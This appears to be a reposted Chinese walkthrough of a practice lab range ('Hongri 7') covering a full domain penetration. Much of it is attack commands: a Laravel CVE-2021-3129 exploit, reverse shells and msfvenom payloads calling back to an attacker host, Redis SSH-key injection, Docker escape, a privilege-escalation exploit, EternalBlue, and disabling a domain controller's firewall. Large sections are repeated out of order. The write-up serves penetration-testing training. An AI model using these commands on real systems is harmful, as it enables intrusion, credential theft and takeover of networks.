靶场实操|域渗透之红日靶场7

华盟君渗透测试 2年前

4.42K 0

靶场实操|域渗透之红日靶场7

拓扑图
环境配置

DMZ区的 Ubuntu 需要启动redis和nginx服务（经过后面的心酸，这里的redis得用root权限启动）：
第二层网络的 Ubuntu需要启动docker容器（仍然需要root）：
第二层网络的 Windows 7 （PC 1）需要启动通达OA（这个得用administrator启动哦，并且要关闭防火墙）：
开始配置
至此环境配置完成
sudo su
redis-server /etc/redis.conf
/usr/sbin/nginx -c /etc/nginx/nginx.conf
iptables -F
sudo su
service docker start
docker start 8e172820ac78
C:MYOAbinAutoConfig.exe
域用户账户和密码如下：
Ubuntu 1：
Ubuntu 2：
通达OA账户（不重要）：
Administrator：Whoami2021
whoami：Whoami2021
bunny：Bunny2021
moretz：Moretz2021
web：web2021
ubuntu：ubuntu
admin：admin657260
Windows Server 2012 和 Windows 7（PC 2）都只配置了一个网卡，连接在 VMnet14 上连通第三层网络
Ubuntu（Web 2）和 Windows 7（PC 1）都配置了两个网卡，一个连接在 VMnet8 上连通第二层网络，一个连接在 VMnet14 上，设为仅主机模式，IP段设为 192.168.93.0/24 连通第三层网络
Ubuntu（Web 1）配置了两个网卡，一个桥接可以对外提供服务，IP段设为 192.168.43.0/24，一个连接在 VMnet8 上，设为NAT模式，IP段设为 192.168.52.0/24 连通第二层网络
DMZ区IP段为192.168.43.1/24 因为我这里是开热点打的图用的网上的
第二层网络环境IP段为192.168.52.1/24
第三层网络环境IP段为192.168.93.1/24
DMZ区域
第二层网络区域
第三层网络区域
用户名密码
后面的网卡设置好就行
网络配置好了还需要配置服务

渗透开始

添加93网段的路由
然后探测93网段存活机器
发现两台存活的windows 分别为DC（192.168.93.30）和PC2（192.168.93.40）
先扫端口通过扫端口发现都开了445 那就测一测永恒之蓝
直接弹回会话了
第四台拿下现在只剩下域控了既然前面抓到了域管的密码直接用psexec登录得了
失败了，应该是开了防火墙的原因。
没关系，我们已经有了域控的密码了，就可以控制第二层网络的Windows 7远程关闭域控的防火墙了。首先控制第二层网络的Windows 7与域控建立ipc连接：
连上了然后来关防火墙
然后在次尝试psexec
拿下域控到此拿下了所有机器
权限维持就不做了
后记最后想了一下其他思路因为第二层的网络是出网的所以可以直接上线cs 在cs上操作也是可以的
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.1-255
set threads 5
run
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.93.40
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
exploit
use exploit/windows/smb/psexec
set rhosts 192.168.93.30
set SMBUser administrator
set SMBPass Whoami2021
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
run
net use 192.168.93.30ipc$ "Whoami2021" /user:"Administrator"
sc 192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc 192.168.93.30 start unablefirewall
首先扫描一下第二层网络（192.168.52.0/24）是否有存活 windows 主机
直接挂socks 进一步探测信息
发现有个8080端口然后浏览器开启代理打开看看
发现是一个通达OA V11.3 然后直接通过exp直接上
上工具，这个工具有个坑，有个获取cookie的功能但是获取不了，只有自己去网页上粘cookie过来。成功获取到了shell
然后上线msf
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.52.1-255
set threads 5
run
发现了一台30的机器
use auxiliary/server/socks_proxy
set srvhost 192.168.43.35
set version 4a socks版本
run
bunny：Bunny2021
administrator：Whoami2021
ipconfig /all # 查看本机ip，所在域
route print # 打印路由信息
net view # 查看局域网内其他主机名
arp -a # 查看arp缓存
net start # 查看开启了哪些服务
net share # 查看开启了哪些共享
net share ipc$ # 开启ipc共享
net share c$ # 开启c盘共享
net use 192.168.xx.xxipc$ "" /user:"" # 与192.168.xx.xx建立空连接
net use 192.168.xx.xxc$ "密码" /user:"用户名" # 建立c盘共享
dir 192.168.xx.xxc$user # 查看192.168.xx.xx c盘user目录下的文件
net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user # 查看本机用户列表
net user /domain # 查看域用户
net localgroup administrators # 查看本地管理员组（通常会有域用户）
net view /domain # 查看有几个域
net user 用户名 /domain # 获取指定域用户的信息
net group /domain # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）
net group 组名 /domain # 查看域中某工作组
net time /domain // 主域服务器会同时作为时间服务器
net group "domain admins" /domain # 查看域管理员的名字
net group "domain computers" /domain # 查看域中的其他主机名
net group "doamin controllers" /domain # 查看域控制器（可能有多台）
net group "Enterprise Admins" /domain // 查看域管理员组
use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.43.35
set lport 5555
run
上线之后进行内网信息收集
.
综合上面收集的信息，我们可知，目标网络环境存在一个名为whoamianony.org的域环境，域控制器主机名为DC.whoamianony.org，IP为192.168.93.30，域管理员为Administrator。
然后迁移到64进程上进行抓密码
成功抓到域用户和域管理员的密码
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.35 LPORT=4445 -f elf > ubuntu.elf
然后远程下载发现是可以下载的说明可以出网
如果这里不能出网的话就需要通过先把马子传到192.168.43.129上然后在下载到52.20这一台上这也的话马子也需要重新生成设置代理
cd /tmp
vim exploit.c #将下载的exploit.c内容粘贴到该文件中
gcc exploit.c -o exploit
chmod +x exploit
./exploit
提权成功然后现在上线msf进行内网渗透
Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM
拿到了web，192.168.43.129；192.168.52.10
拿到了ubuntu，192.168.52.20；192.168.93.10
还是先把这个上线msf 以便后续操作
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.35 LPORT=3333 -f elf > web.elf
然后远程下载马子
然后msf开启监听
然后执行上线
因为开始第一步我们就将公钥写进去192.168.50.20了是不是我们可以直接将kali的公钥下载到拿下的A机器然后直接连接但是还是要输入密码很奇怪按道理我看网上的有人是可以成功的这里我没成功就不管了
然后我重新试了一下还是成功连上了可能是因为我第一天关机了原因
重新通过第一步的shell写密钥到192.168.52.20上然后下载kali的公钥连接上了
这里既然连接上了就不用另一种方法了
但还是介绍一下另一种方法
我们通过redis拿下了192.168.43.129(192.168.52.10)这一台这一台和192.168.52.20 有共同的网段的是可以直接连的所以就可以通过shell弹一个会话到43.129这一台机器上然后在这一台机器上进行docker提权以及特权模式逃逸直接在129这一台机器上生成密钥然后写入到52.20中然后连接进行逃逸
use exploit/multi/handler
set lhost 192.168.31.96
set lport 3333
set payload linux/x86/meterpreter/reverse_tcp
run
因为开始确确实实是把ssh公钥写入了但是怎么会连不上哎然后查看了下nginx的配置
发现了 nginx 反向代理的标志 proxy_pass
攻击的机器192.168.43.129（192.168.52.10）服务器上的 nginx 将 81 端口收到的请求转发给了 192.168.52.20，将 80 端口收到的请求转发给了 http://whoamianony.top
所以这个docker的宿主机的192.168.20.20上就算公钥写进去了但是连不上不在同一个网段那个是
如果说192.168.43.129(192.168.52.10)是A机器 192.168.52.20是B机器 docker是B1
那么我们开始用马子拿下的就是B中的B1 redis拿下的才是A
先安装redis-cli工具
然后连接
尝试用redis写入ssh公钥
wget http://download.redis.io/redis-stable.tar.gz
tar -zxvf redis-stable.tar.gz
cd redis-stable
make //全局生效
cp src/redis-cli /usr/bin/
redis-cli -h 192.168.43.129
config set dir /root/.ssh #设置redis的备份路径为/root/.ssh/
config set dbfilename authorized_keys #设置保存文件名为authorized_keys
save #将数据保存在目标服务器硬盘上
ssh 192.168.213.188 #连接
直接连上了
(echo -e "nn"; cat /root/.ssh/id_rsa.pub; echo -e "nn") > key.txt
cat key.txt | redis-cli -h 192.168.43.129 -x set hello
ssh-keygen -t rsa
kali生成ssh公钥
将公钥导入key.txt文件(前后用n换行，避免和Redis里其他缓存数据混合)，再把key.txt文件内容写入目标主机的redis缓冲里：
然后进入redis将公钥写入（这里redis要是不用root启，就不行）
先fdisk -l查看磁盘挂载
sda1盘疑似挂载于宿主机上，利用mount挂载于我们创建的目录之上
然后ls hack就可以看到宿主机部分文件
来到/hack/home/ubuntu下可以看到有.ssh文件
那就可以写入密钥
先在kali中生成密钥创建一个key文件
然后将密钥复制
然后写入目标的.ssh目录下
命令：cp -avx /hack/home/ubuntu/.ssh/id_rsa.pub /hack/home/ubuntu/.ssh/authorized_keys(我这里是切换到.ssh目录下复制的因为我直接全路径不知道为什么失败)(后来发现是hack前面不需要/)
然后写入到authorized_keys里面
然后用kali连接ubuntu
但是发现还是需要密码这就奇怪了
然后换思路因为发现还有6379 有redis 所以从redis搞
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH # 将/tmp添加到环境变量中，并且先加载执行/tmp里的程序
cd /home/jobs
./shell# 然后就获得了root权限，可以执行命令了
命令：bash -c "bash -i >& /dev/tcp/192.168.43.35/1234 0>&1"
find / -perm -u=s -type f 2>/dev/null
https://github.com/BeichenDream/Godzilla下载地址
命令：git clone git://github.com/crisprss/Laravel_CVE-2021-3129_EXP.git
22的ssh
80的nginx
81的Laravel
6379的redis
命令：nmap -T4 -A 192.168.31.132 -p 1-65535
外网渗透
拿到DMZ的ip：192.168.43.129 首先打开看看
空白啥都没有但是网上的那些有blog不知道怎么回事先不管扫端口
扫出4个端口
因为80没东西所以打开81看看
是一个Laravel v8.29.0（一个简洁、开源的 PHP Web 开发框架）
直接网上找找公开漏洞
发现是有漏洞的CVE-2021-3129 然后直接找exp打
https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
克隆exp到kali
然后将里面默认的url改为目标192.168.43.129
然后克隆phpggc到exp目录下因为需要同目录
命令：git clone git://github.com/ambionics/phpggc.git
然后执行命令：python3 exploit.py
然后改一下py脚本改成任意执行命令
Vim打开脚本，首先在exploit.py开头import sys库
主函数改为如下内容（注意缩进）
args = sys.argv
url = args[1]
command = args[2]
Exp(url, command)
然后执行命令
然后写shell 但是用这个exp一直写不上就换了一个exp
直接写shell的
然后用哥斯拉链接2.92版本的 3.03不知道为什么连不上
连上shell
首先判断当前环境和权限发现有些命令无法执行怀疑是在容器里面
判断是否为docker
确实是在docker里面所以就需要进行docker逃逸
但是当前权限较低
所以需要进行提权先通过命令来搜索具有SUID或4000权限的文件：
发现 /home/jobs/shell 文件比较特别然后切换到目录看看
但是发现在哥斯拉执行的时候切换不了不知道什么情况那就先弹个会话到kali
然后在kali上试试能不能行
然后通过查看demo.c文件发现是调用的ps命令且并未使用绝对路径
那么尝试更改$PATH来执行恶意程序，从而获得目标主机的 root 权限 shell
然后先弹个root的会话
然后使用特权模式进行docker逃逸
redis未授权
docker逃逸失败的原因
docker再次逃逸（柳暗花明）
所以到现在已经拿下了两台
但192.168.52.20是ubuntu用户权限不高我们要得肯定是root最好先进行信息收集看看能不能提权
14.04 刚好上次打靶场的时候遇到这个版本可以提权用CVE-2021-3493
漏洞利用 exp 下载地址：https://github.com/briskets/CVE-2021-3493
漏洞影响版本：
直接将下载的exp的内容复制到这台机器编译一个
先添加一个路由这台是192.168.43.129
然后生成一个马子
然后下载执行上线
好了现在都上线了开启socks代理探测内网
第二层内网渗透
第二层内网渗透

use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.43.35
set lport 5555
run
上线之后进行内网信息收集
.
综合上面收集的信息，我们可知，目标网络环境存在一个名为whoamianony.org的域环境，域控制器主机名为DC.whoamianony.org，IP为192.168.93.30，域管理员为Administrator。
然后迁移到64进程上进行抓密码
成功抓到域用户和域管理员的密码

ipconfig /all # 查看本机ip，所在域
route print # 打印路由信息
net view # 查看局域网内其他主机名
arp -a # 查看arp缓存
net start # 查看开启了哪些服务
net share # 查看开启了哪些共享
net share ipc$ # 开启ipc共享
net share c$ # 开启c盘共享
net use 192.168.xx.xxipc$ "" /user:"" # 与192.168.xx.xx建立空连接
net use 192.168.xx.xxc$ "密码" /user:"用户名" # 建立c盘共享
dir 192.168.xx.xxc$user # 查看192.168.xx.xx c盘user目录下的文件
net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user # 查看本机用户列表
net user /domain # 查看域用户
net localgroup administrators # 查看本地管理员组（通常会有域用户）
net view /domain # 查看有几个域
net user 用户名 /domain # 获取指定域用户的信息
net group /domain # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）
net group 组名 /domain # 查看域中某工作组
net time /domain // 主域服务器会同时作为时间服务器
net group "domain admins" /domain # 查看域管理员的名字
net group "domain computers" /domain # 查看域中的其他主机名
net group "doamin controllers" /domain # 查看域控制器（可能有多台）
net group "Enterprise Admins" /domain // 查看域管理员组

bunny：Bunny2021
administrator：Whoami2021

use auxiliary/server/socks_proxy
set srvhost 192.168.43.35
set version 4a socks版本
run

use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.52.1-255
set threads 5
run
发现了一台30的机器

首先扫描一下第二层网络（192.168.52.0/24）是否有存活 windows 主机
直接挂socks 进一步探测信息
发现有个8080端口然后浏览器开启代理打开看看
发现是一个通达OA V11.3 然后直接通过exp直接上
上工具，这个工具有个坑，有个获取cookie的功能但是获取不了，只有自己去网页上粘cookie过来。成功获取到了shell
然后上线msf

use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.43.35
set lport 5555
run
上线之后进行内网信息收集

ipconfig /all # 查看本机ip，所在域
route print # 打印路由信息
net view # 查看局域网内其他主机名
arp -a # 查看arp缓存
net start # 查看开启了哪些服务
net share # 查看开启了哪些共享
net share ipc$ # 开启ipc共享
net share c$ # 开启c盘共享
net use 192.168.xx.xxipc$ "" /user:"" # 与192.168.xx.xx建立空连接
net use 192.168.xx.xxc$ "密码" /user:"用户名" # 建立c盘共享
dir 192.168.xx.xxc$user # 查看192.168.xx.xx c盘user目录下的文件
net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user # 查看本机用户列表
net user /domain # 查看域用户
net localgroup administrators # 查看本地管理员组（通常会有域用户）
net view /domain # 查看有几个域
net user 用户名 /domain # 获取指定域用户的信息
net group /domain # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）
net group 组名 /domain # 查看域中某工作组
net time /domain // 主域服务器会同时作为时间服务器
net group "domain admins" /domain # 查看域管理员的名字
net group "domain computers" /domain # 查看域中的其他主机名
net group "doamin controllers" /domain # 查看域控制器（可能有多台）
net group "Enterprise Admins" /domain // 查看域管理员组

.
综合上面收集的信息，我们可知，目标网络环境存在一个名为whoamianony.org的域环境，域控制器主机名为DC.whoamianony.org，IP为192.168.93.30，域管理员为Administrator。
然后迁移到64进程上进行抓密码
成功抓到域用户和域管理员的密码

bunny：Bunny2021
administrator：Whoami2021

第三层内网渗透
添加93网段的路由
然后探测93网段存活机器

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.1-255
set threads 5
run

发现两台存活的windows 分别为DC（192.168.93.30）和PC2（192.168.93.40）
先扫端口通过扫端口发现都开了445 那就测一测永恒之蓝

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.93.40
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
exploit

直接弹回会话了
第四台拿下现在只剩下域控了既然前面抓到了域管的密码直接用psexec登录得了

use exploit/windows/smb/psexec
set rhosts 192.168.93.30
set SMBUser administrator
set SMBPass Whoami2021
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
run

失败了，应该是开了防火墙的原因。
没关系，我们已经有了域控的密码了，就可以控制第二层网络的Windows 7远程关闭域控的防火墙了。首先控制第二层网络的Windows 7与域控建立ipc连接：

net use 192.168.93.30ipc$ "Whoami2021" /user:"Administrator"

连上了然后来关防火墙

sc 192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc 192.168.93.30 start unablefirewall

然后在次尝试psexec
拿下域控到此拿下了所有机器
权限维持就不做了
后记最后想了一下其他思路因为第二层的网络是出网的所以可以直接上线cs 在cs上操作也是可以的

文章来源：亿人安全

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！

如侵权请私聊我们删文

END

靶场实操|域渗透之红日靶场7

本文来源亿人安全，经授权后由华盟君发布，观点不代表华盟网的立场，转载请联系原作者。

官方

华盟君

4.55K篇文章 124.76M总阅读量

上一篇：用友系列全漏洞检测工具下一篇：毕业生盗取全校学生信息？中国人民大学最新通报；7月起一批网络安全相关新规将开始施行!

靶场实操|域渗透之红日靶场7

拓扑图

渗透开始

外网渗透

第二层内网渗透

第二层内网渗透

第三层内网渗透

相关文章

渗透专用虚拟机（公开版）

HTTP绕WAF之浅尝辄止

实战 | 记一次对某鱼骗子卖家的溯源

发表评论取消回复

拓扑图

渗透开始

外网渗透

第二层内网渗透

第二层内网渗透

第三层内网渗透

相关文章

渗透专用虚拟机（公开版）

HTTP绕WAF之浅尝辄止

实战 | 记一次对某鱼骗子卖家的溯源

发表评论 取消回复

发表评论取消回复